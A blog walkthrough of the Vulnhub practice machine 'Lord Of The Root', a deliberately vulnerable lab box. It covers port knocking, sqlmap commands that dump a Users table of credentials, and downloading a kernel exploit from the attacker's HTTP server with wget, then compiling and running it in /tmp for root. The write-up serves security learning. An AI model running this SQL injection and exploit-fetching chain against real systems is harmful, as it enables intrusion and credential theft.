Lord Of The Root: 1.0.1 Vulnhub Walkthrough

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Hello Everyone, in this blog i am going to post walkthrough of Lord Of The Root 1.0.1.

This machine is for beginners

Let’s Start,

Target IP-

Attacker IP-

let’s scan target IP

nmap -sC -sV -p- -Pn

There is only 1 port open.

22- ssh

I tried connecting to ssh.


I tried few default passwords but it didn’t work.

When you see it carefully, The banner says “knock Friend To Enter” and under that it says “Easy as 1,2,3”.

Later, I got to know that there is something called “Port Knocking“.

Click Here, To know about Port Knocking.

So, Let’s knock ports 1,2,3.

nmap -sT -r -p 1,2,3

-sT : Connect scan

-r : Scan ports consecutively – don’t randomize

Let’s scan the target again,

nmap -sS -A -p-

Ok, Now we can see 1 more port got opened and a Website is running on it.

1337- http

It’s an image, I checked page source but i didn’t find anything.

So, I did Nikto

nikto -h

I found a directory /images/ .

So, we got image files.

I checked every file but didn’t get anything.

Thought of checking /robots.txt.

It has an image.

I checked page source, and i found BASE64 encoded string .

I deocoded it twice.

So, we got a directory /978345210/index.php .

we got a login page, tried few usernames and passwords but i couldn’t login.

I used SQLMAP.

sqlmap -u –forms –dbs –risk=3 –level=5 –threads=4 –batch

So, There 4 databases available.

Next, I checked Tables in Webapp Database.

sqlmap -u –forms -D Webapp –tables

we got the table Users.

Let’s check for columns.

sqlmap -u –forms -D Webapp -T Users –columns

We got id,password and username.

Let’s dump them.

sqlmap -u –forms -D Webapp -T Users -C id,password,username –dump

Ok, we got some usernames and password .

i tried to login in webpage But failed.

As ssh is running i tried to login.

Only one username and password worked i.e


ssh smeagol@

I got the shell.

Now, i checked for the Linux version.

uname -a

I checked if any exploit available for that Version and found it.

I downloaded the exploit in my kali and started HTTP server.

python -m SimpleHTTPServer 8080

After this i moved into the tmp folder in the shell and downloaded the exploit using wget.

Compiled and executed it.

cd /tmp


gcc 39166.c -o exploit


here, I got ROOT!!!

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Leave a Comment

Your email address will not be published.

Scroll to Top